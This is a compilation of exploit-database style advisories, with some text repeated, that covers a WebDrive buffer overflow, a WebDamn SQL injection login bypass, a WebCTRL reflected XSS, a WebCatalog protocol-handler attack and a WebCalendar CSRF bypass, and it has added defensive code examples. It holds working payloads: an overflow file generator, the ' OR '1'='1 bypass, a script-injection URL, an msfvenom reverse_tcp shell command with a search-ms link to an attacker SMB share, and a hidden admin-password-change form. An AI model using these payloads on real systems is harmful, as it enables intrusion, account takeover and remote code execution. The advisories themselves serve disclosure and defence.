Crash Analysis using WinDBG:
============================
(430.9f8): Access violation - code c0000005 (!!! second chance !!!)
eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
0055ff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:001d1000=????
0:000> !exchain
001c8d20: webdrive+35a24e (005aa24e)
001cb768: webdrive+1c0041 (00410041)
Invalid exception stack at 00410041
0:000> d 001cb768
001cb768  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb778  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb788  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb798  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

WebDAV over SSL
============================
Crash Analysis using WinDBG:
============================
(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
eip=00410041 esp=000a1238 ebp=000a1258 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\ipworks9.dll - 
ipworks9!IPWorks_SNPP_Get+0x57f:
00410041 038d4df0e8da    add     ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
0:000>!exchain
Invalid exception stack at 00410041

FTP and FTP over SSL
============================
Crash Analysis using WinDBG:
============================
(834.70c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002d8c1c: webdrive+35a24e (015da24e)
002db664: 00410041
Invalid exception stack at 00410041

Amazon S3
============================
Crash Analysis using WinDBG:
============================
(a64.a98): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002f8c7c: webdrive+35a24e (015da24e)
002fb6c4: 00410041
Invalid exception stack at 00410041

SFTP
============================
Crash Analysis using WinDBG:
============================
(848.9a8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
00238824: webdrive+35a24e (015da24e)
0023b26c: 00410041
Invalid exception stack at 00410041

FrontPage Server
============================
Crash Analysis using WinDBG:
============================
(cd4.710): Access violation - code c0000005 (!!! second chance !!!)
eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
003bff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:007c1000=????
0:000> !exchain
007b89b4: webdrive+35a24e (0040a24e)
007bb3fc: webdrive+360041 (00410041)
Invalid exception stack at 00410041

'''

#Proof of Concept:

buffer = "http://"
buffer += "\x41" * 70000
off = buffer

try:
    out_file = open("WebDrive.txt", 'w')
    out_file.write(off)
    out_file.close()
    print("[*] Malicious txt file created successfully")
except IOError:
    print("[!] Error creating file")
            
Document Title:
===============
WebDrive 12.2 (B4172) - Buffer Overflow Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1500


Release Date:
=============
2015-06-01


Vulnerability Laboratory ID (VL-ID):
====================================
1500


Common Vulnerability Scoring System:
====================================
6.8


Product & Service Introduction:
===============================
Unlike a typical FTP client, WebDrive allows you to open and edit server-based files without the additional step of downloading the file.
Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and
Amazon S3 and maps a drive letter to each of these servers. You can map unique drive letters to multiple servers. Download the
full-function 20-day trial of WebDrive and make file management on remote servers easier and more efficient!

(Copy of the Vendor Homepage: http://www.webdrive.com/products/webdrive/ )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory researcher discovered a Unicode buffer overflow vulnerability in the official WebDrive v12.2 (Build 4172) 32 bit software.


Vulnerability Disclosure Timeline:
==================================
2015-06-01: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
South River Technologies
Product: WebDrive - Software 12.2 (Build 4172) 32 bit


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A buffer overflow vulnerability has been discovered in the official WebDrive v12.2 (Build 4172) 32 bit software.
The vulnerability allows a system user account to supply long Unicode strings to basic inputs and thereby compromise the software process or system.

A failure to sanitize the URL/Address input results in compromise of the software process. Attackers are able to
supply large Unicode strings that overwrite registers such as EIP and EBP. WebDrive connects to many types of web servers,
as well as servers in the cloud. You can use WebDrive to access your files on all of the following server types and protocols:

WebDAV ------------>Vulnerable
WebDAV over SSL---->Vulnerable
FTP---------------->Vulnerable
FTP over SSL------->Vulnerable
Amazon S3---------->Vulnerable
SFTP--------------->Vulnerable
FrontPage Server--->Vulnerable

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.8. 
Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the vulnerability 
results in system compromise by elevation of privileges via overwrite of the registers.

Vulnerable Module(s):
						[+] URL/Address

Note: Unlike a typical FTP client, WebDrive allows you to open and edit server-based files without the additional step of downloading the file.
Using a simple wizard, you assign a network drive letter to the FTP Server. WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and
maps a drive letter to each of these servers. You can map unique drive letters to multiple servers. Download the full-function 20-day trial of WebDrive and
make file management on remote servers easier and more efficient!


Proof of Concept (PoC):
=======================
The buffer overflow web vulnerability can be exploited by local attackers with low privilege system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Copy the AAAA...string from WebDrive.txt to clipboard
2. Create a connection 
3. Paste it in the URL/Address and attempt to connect.


--- Crash Analysis using WinDBG: [WebDAV] ---
(430.9f8): Access violation - code c0000005 (!!! second chance !!!)
eax=001cad5c ebx=02283af8 ecx=00000041 edx=02289d9c esi=fdf47264 edi=001cad5c
eip=0055ff2b esp=001c8cfc ebp=001c8d00 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
0055ff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:001d1000=????
0:000> !exchain
001c8d20: webdrive+35a24e (005aa24e)
001cb768: webdrive+1c0041 (00410041)
Invalid exception stack at 00410041
0:000> d 001cb768
001cb768  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb778  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb788  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb798  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7a8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7b8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7c8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
001cb7d8  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

WebDAV over SSL
============================
Crash Analysis using WinDBG:
============================
(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
eip=00410041 esp=000a1238 ebp=000a1258 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\ipworks9.dll - 
ipworks9!IPWorks_SNPP_Get+0x57f:
00410041 038d4df0e8da    add     ecx,dword ptr [ebp-25170FB3h] ss:0023:daf302a5=????????
0:000>!exchain
Invalid exception stack at 00410041

FTP and FTP over SSL
============================
Crash Analysis using WinDBG:
============================
(834.70c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002d8c1c: webdrive+35a24e (015da24e)
002db664: 00410041
Invalid exception stack at 00410041

Amazon S3
============================
Crash Analysis using WinDBG:
============================
(a64.a98): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002f8550 edi=00000000
eip=775e64f4 esp=002f84e8 ebp=002f853c iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002f8c7c: webdrive+35a24e (015da24e)
002fb6c4: 00410041
Invalid exception stack at 00410041

SFTP
============================
Crash Analysis using WinDBG:
============================
(848.9a8): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002380f8 edi=00000000
eip=775e64f4 esp=00238090 ebp=002380e4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
00238824: webdrive+35a24e (015da24e)
0023b26c: 00410041
Invalid exception stack at 00410041

FrontPage Server
============================
Crash Analysis using WinDBG:
============================
(cd4.710): Access violation - code c0000005 (!!! second chance !!!)
eax=007ba9f0 ebx=05d29738 ecx=00000041 edx=05d2fd48 esi=faa912b8 edi=007ba9f0
eip=003bff2b esp=007b8990 ebp=007b8994 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\WebDrive\webdrive.exe
webdrive+0x30ff2b:
003bff2b 66890c16        mov     word ptr [esi+edx],cx    ds:0023:007c1000=????
0:000> !exchain
007b89b4: webdrive+35a24e (0040a24e)
007bb3fc: webdrive+360041 (00410041)
Invalid exception stack at 00410041


PoC: Exploit code

buffer = "http://"
buffer += "\x41" * 70000
off = buffer

try:
    out_file = open("WebDrive.txt", 'w')
    out_file.write(off)
    out_file.close()
    print("[*] Malicious txt file created successfully")
except IOError:
    print("[!] Error creating file")
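The WinDbg excerpts in this advisory and in the metacom PoC above all show the same two signals: a register or EIP equal to 00410041, and an SEH record whose handler is 00410041, which is the UTF-16LE encoding of "AA". As an added example, not metacom's or Vulnerability-Lab's code, the triage helper below parses such a transcript, extracts the register state and the !exchain records, and reports which values decode as printable ASCII-range UTF-16 text, i.e. which ones were overwritten by the input string. The two sample transcripts are the FTP/FTP-over-SSL and WebDAV-over-SSL excerpts from the advisory, trimmed to the lines the parser reads.

```python
import re
from typing import Dict, List, Optional

# FTP / FTP over SSL excerpt from the advisory above.
SAMPLE_FTP = """\
(834.70c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00410041 ecx=00000400 edx=00000000 esi=002d84f0 edi=00000000
eip=775e64f4 esp=002d8488 ebp=002d84dc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
ntdll!KiFastSystemCallRet:
775e64f4 c3              ret
0:000> !exchain
002d8c1c: webdrive+35a24e (015da24e)
002db664: 00410041
Invalid exception stack at 00410041
"""

# WebDAV over SSL excerpt from the advisory above.
SAMPLE_WEBDAV_SSL = """\
(b88.ca0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=00410041 edx=775e660d esi=00000000 edi=00000000
eip=00410041 esp=000a1238 ebp=000a1258 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
0:000>!exchain
Invalid exception stack at 00410041
"""

REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
# "<record>: <symbol> (<handler>)" or "<record>: <handler>" lines printed by !exchain
EXCHAIN_RE = re.compile(r"^([0-9a-f]{8}): (?:.*\(([0-9a-f]{8})\)|([0-9a-f]{8}))\s*$", re.M)

def parse_registers(text: str) -> Dict[str, int]:
    return {name: int(val, 16) for name, val in REG_RE.findall(text)}

def parse_exchain(text: str) -> List[Dict[str, int]]:
    """Each SEH record as its address and the handler address it points to."""
    return [{"record": int(m.group(1), 16), "handler": int(m.group(2) or m.group(3), 16)}
            for m in EXCHAIN_RE.finditer(text)]

def as_ascii_utf16(value: int) -> Optional[str]:
    """If the 32-bit value, as stored in memory (little-endian), is two
    printable ASCII-range UTF-16LE code units, return them as text."""
    units = (value & 0xFFFF, (value >> 16) & 0xFFFF)
    if all(0x20 <= u <= 0x7E for u in units):
        return "".join(chr(u) for u in units)
    return None

def triage(text: str) -> Dict[str, object]:
    regs = parse_registers(text)
    chain = parse_exchain(text)
    tainted = [r for r in chain if as_ascii_utf16(r["handler"])]
    return {
        "eip_controlled": as_ascii_utf16(regs.get("eip", 0)) is not None,
        "seh_handler_controlled": bool(tainted),
        "tainted_handlers": [as_ascii_utf16(r["handler"]) for r in tainted],
        "tainted_registers": sorted(n for n, v in regs.items() if as_ascii_utf16(v)),
    }

if __name__ == "__main__":
    for name, sample in (("FTP", SAMPLE_FTP), ("WebDAV over SSL", SAMPLE_WEBDAV_SSL)):
        print(name, triage(sample))
```

The ASCII-range restriction matters: a legitimate code address such as 775e64f4 also decodes to two valid UTF-16 code units, so a naive "does it decode" test would misclassify it. An overwritten SEH handler or EIP is what separates a crash that is only a denial of service from one that needs the higher severity this advisory assigns.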


Reference(s):
http://www.webdrive.com/products/webdrive/
https://www.webdrive.com/products/webdrive/download/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by secure parsing and input restriction of the vulnerable URL/Address parameter.


Security Risk:
==============
The security risk of the buffer overflow vulnerability in the URL/Address parameter is estimated as high. (CVSS 6.8)


Credits & Authors:
==================
metacom


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
            
# Exploit Title: WebDamn User Registration & Login System with User Panel - SQLi Auth Bypass
# Date: 18-11-2020
# Exploit Author: Aakash Madaan
# Vendor Homepage: https://webdamn.com/
# Software Link : https://webdamn.com/user-management-system-with-php-mysql/
# Version: N/A (Default)
# Tested on: Windows 10 professional

Steps to reproduce:
1. Open the user login page using the following URL:
-> http://localhost/login.php

2. If the attacker gets access to a valid email address (leaked data or by any
other means), then he/she can use the email address as follows:
Payload: <email>' OR '1'='1
NOTE: Use the above payload in both the username and password fields

3. The server accepts the payload and the attacker is able to bypass the user
login panel with only the email address.
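The bypass described in step 2, next to the query change that removes it, as an added example (not code from the WebDamn package); the in-memory SQLite table, its column names, the `login_*` function names and the clear-text password storage are assumptions made to keep the example short.

```python
import sqlite3

# Constructed sample: the advisory's payload with a placeholder e-mail address.
PAYLOAD = "alice@example.com' OR '1'='1"


def make_db():
    """In-memory stand-in for the application's user table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO users (email, password) VALUES (?, ?)",
                 ("alice@example.com", "correct horse battery staple"))
    conn.commit()
    return conn


def build_vulnerable_sql(email, password):
    """The query shape that makes the bypass work: input pasted into the SQL text."""
    return ("SELECT id FROM users WHERE email = '" + email +
            "' AND password = '" + password + "'")


def login_vulnerable(conn, email, password):
    # With the payload in both fields the WHERE clause becomes
    #   email = 'alice@example.com' OR '1'='1' AND password = 'alice@example.com' OR '1'='1'
    # and the trailing OR '1'='1' is true for every row, so any user row matches.
    row = conn.execute(build_vulnerable_sql(email, password)).fetchone()
    return row is not None


def login_fixed(conn, email, password):
    # Parameterised query: the values travel separately from the SQL text, so
    # quotes inside them are data and cannot change the query's structure.
    row = conn.execute(
        "SELECT id FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))  # True
    print("fixed login with payload:     ", login_fixed(db, PAYLOAD, PAYLOAD))       # False
    print("fixed login with real creds:  ",
          login_fixed(db, "alice@example.com", "correct horse battery staple"))       # True
```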
            
# Exploit Title: WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)
# Date: 4/07/2021
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.automatedlogic.com/en/products/webctrl-building-automation-system/
# Version: 6.5 and Below
# CVE : CVE-2021-31682

--Summary--

The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. 

Automated Logic
https://www.automatedlogic.com/en/products-services/webctrl-building-automation-system/

--Affects--

- WebCTRL OEM
- Versions 6.5 and prior

--Details--

The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows for reflected XSS attacks due to the operatorlocale GET parameter not being sanitized. This issue impacts versions 6.5 and below. This issue works by passing in a basic XSS payload to a vulnerable GET parameter that is reflected in the output without sanitization. This can allow for several issues including but not limited to:

- Hijacking a user's session
- Using XSS payloads to capture input (keylogging)


-- Proof of Concept --
The following URL parameter was impacted and can be exploited with the sample payload provided below:
- https://example.com/index.jsp?operatorlocale=en/><script>alert("xss")</script> 

--Mitigation--

Sanitize any user controlled input in both form fields and URL parameters to properly encode data so it is not rendered as arbitrary HTML/JavaScript.

--Timeline--

- 4/07/2021: XSS Vulnerability was discovered and documented. 
- 4/17/2021: A temporary CVE identifier was requested by MITRE. Automated Logic was also notified with the full details of each finding via their product security contact at https://www.automatedlogic.com/en/about/security-commitment/. A baseline 90 day disclosure timeline was established in the initial communication.
- 7/23/2021: MITRE Assigns CVE ID CVE-2021-31682 to the vulnerability.
- 9/08/2021: Automated Logic formally responds requesting the CVE identifier and states that the issue should be patched in newer versions of the product.
- 10/20/2021: The researcher responds with the CVE identifier and a request for all impacted version numbers so they can release a more accurate impacted list of products when full disclosure occurs. Automated Logic responds with a list of impacted versions the same day, and the researcher publicly discloses the issue and submits a CVE details update request to MITRE.
            
# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222

Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victim's machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.

Exploit details:

-   Create a reverse shell file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe



-   Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)

python3 smbserver.py Tools -smb2support



-   Have the user sync a page with the payload as a renamed link

[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)



Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title
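A scheme allowlist of the kind the summary says is missing, as an added example written in Python rather than in WebCatalog's or Electron's code; the same test belongs in front of every call to shell.openExternal. The function names and the sample links are constructed for this example.

```python
from urllib.parse import urlsplit

# Only web resources may be handed to the operating system's URL handler.
ALLOWED_SCHEMES = frozenset({"http", "https"})


def is_safe_external_url(url):
    """True only for a well-formed http(s) URL that names a host."""
    try:
        parts = urlsplit(url.strip())
    except ValueError:           # e.g. a malformed IPv6 literal in the host part
        return False
    # The comparison is case-insensitive, so "HTTPS://" is accepted and
    # "Search-ms://" is still rejected (urlsplit lower-cases the scheme).
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    # "https:" alone or "http:///path" has no host and is not openable.
    return bool(parts.netloc)


def filter_synced_links(links):
    """Split a synced page's links into those that may be opened and those to drop."""
    allowed, rejected = [], []
    for link in links:
        (allowed if is_safe_external_url(link) else rejected).append(link)
    return allowed, rejected


# Constructed sample links modelled on the advisory's description.
SAMPLE_LINKS = [
    "https://webcatalog.io/en/",
    "HTTP://Example.com/docs",
    "Search-ms://query=report&crumb=location\\\\attacker-host\\share&displayname=Spoofed",
    "file:///etc/hosts",
    "javascript:alert(1)",
    "https:",
]
```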

Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail:  tobias.diehl@bulletproofsi.com
            
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBCALENDAR-V1.2.7-CSRF-PROTECTION-BYPASS.txt

[+] ISR: ApparitionSec



Vendor:
==========================
www.k5n.us/webcalendar.php



Product:
==================
WebCalendar v1.2.7

WebCalendar is a PHP-based calendar application that can be configured as a
single-user calendar, a multi-user calendar for groups of users, or as an
event calendar viewable by visitors. MySQL, PostgreSQL, Oracle, DB2,
Interbase, MS SQL Server, or ODBC is required.

WebCalendar can be setup in a variety of ways, such as...

A schedule management system for a single person
A schedule management system for a group of people, allowing one or more
assistants to manage the calendar of another user
An events schedule that anyone can view, allowing visitors to submit new
events
A calendar server that can be viewed with iCalendar-compliant calendar
applications like Mozilla Sunbird, Apple iCal or GNOME Evolution or
RSS-enabled
applications like Firefox, Thunderbird, RSSOwl, FeedDemon, or BlogExpress.




Vulnerability Type:
======================
CSRF PROTECTION BYPASS



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

WebCalendar attempts to use the HTTP Referer header to check that requests
originate from the same server, as we see below.

From WebCalendar "include/functions.php" file on line 6117:

////////////////////////////////////////////////////////////

function require_valide_referring_url ()
{
  global $SERVER_URL;

  if ( empty( $_SERVER['HTTP_REFERER'] ) ) {
    // Missing the REFERER value
    //die_miserable_death ( translate ( 'Invalid referring URL' ) );
    // Unfortunately, some version of MSIE do not send this info.
    return true;
  }

  if ( ! preg_match ( "@$SERVER_URL@i", $_SERVER['HTTP_REFERER'] ) ) {
    // Gotcha.  URL of referring page is not the same as our server.
    // This can be an instance of XSRF.
    // (This may also happen when more than address is used for your server.
    // However, you're not supposed to do that with this version of
    // WebCalendar anyhow...)
    die_miserable_death ( translate ( 'Invalid referring URL' ) );
  }
}

/////////////////////////////////////////////////////////////////////////////////////////

However, this can be easily defeated by simply not sending a referer. HTML5
includes a handy tag, <meta name="referrer" content="none">, that omits the
referer when making an HTTP request; it is currently supported in Chrome, Safari,
MobileSafari and other WebKit-based browsers. Using this meta tag we send no
referrer, and the vulnerable application will then happily process our CSRF requests.
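The fail-open behaviour described above, next to a fail-closed referer check and a synchronizer token, as an added example in Python (not WebCalendar's code); SERVER_URL, the session and form dictionaries and the function names are assumptions modelled on the advisory's PoC form.

```python
import hmac
import re
import secrets

# Assumed deployment URL, matching the paths used in the advisory's PoC forms.
SERVER_URL = "http://localhost/WebCalendar-1.2.7/"


def referer_check_as_shipped(headers):
    """Python rendering of require_valide_referring_url above; True = accept.
    Like the page's "@$SERVER_URL@i" it is an unanchored, case-insensitive
    substring match (the URL is escaped here so '.' is literal)."""
    referer = headers.get("Referer", "")
    if not referer:
        return True          # fail-open: a request without Referer is accepted
    return re.search(re.escape(SERVER_URL), referer, re.IGNORECASE) is not None


def referer_check_fail_closed(headers):
    """Reject unless Origin or Referer proves a same-site request.
    Origin is consulted first: modern browsers still send it on a cross-site
    POST when the page suppresses Referer (it then reads "null" and fails)."""
    origin = headers.get("Origin")
    if origin:
        return SERVER_URL.lower().startswith(origin.lower().rstrip("/") + "/")
    return headers.get("Referer", "").lower().startswith(SERVER_URL.lower())


def issue_csrf_token(session):
    """Fresh random token kept in the server-side session and embedded in the
    real form; a cross-site page cannot read it, so it cannot forge the POST."""
    session["csrf_token"] = secrets.token_hex(16)
    return session["csrf_token"]


def csrf_token_valid(session, form):
    expected = session.get("csrf_token", "")
    supplied = form.get("csrf_token", "")
    return bool(expected) and hmac.compare_digest(expected, supplied)


def handle_set_password(session, headers, form):
    """Gate for the edit_user_handler.php 'setpassword' action used in the PoC."""
    if form.get("formtype") != "setpassword":
        return "ignored"
    if not referer_check_fail_closed(headers):
        return "rejected: missing or foreign Referer/Origin"
    if not csrf_token_valid(session, form):
        return "rejected: missing or wrong CSRF token"
    return "accepted"


# Constructed sample: the fields of the advisory's first PoC form, arriving
# with no Referer because of <meta name="referrer" content="none">.
FORGED_FORM = {"formtype": "setpassword", "user": "admin",
               "upassword1": "1234567", "upassword2": "1234567"}
FORGED_HEADERS = {}


def legitimate_request():
    """The same POST as the real edit-user page would send it."""
    session = {}
    token = issue_csrf_token(session)
    headers = {"Origin": "http://localhost",
               "Referer": SERVER_URL + "edit_user.php?user=admin"}
    form = dict(FORGED_FORM, csrf_token=token)
    return session, headers, form
```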



Exploit code(s):
===============

1) CSRF Protection Bypass to change Admin password POC. Note: Name of the victim user is required for success.


<meta name="referrer" content="none">

<form id="CSRF" action="http://localhost/WebCalendar-1.2.7/edit_user_handler.php" method="post">
<input type="hidden" name="formtype" value="setpassword" />
<input type="hidden" name="user" value="admin" />
<input name="upassword1" id="newpass1" type="password" value="1234567"  />
<input name="upassword2" id="newpass2" type="password"  value="1234567" />
</form>


2) CSRF Protection Bypass to modify access controls under "System Settings" / "Allow public access"

<meta name="referrer" content="none">

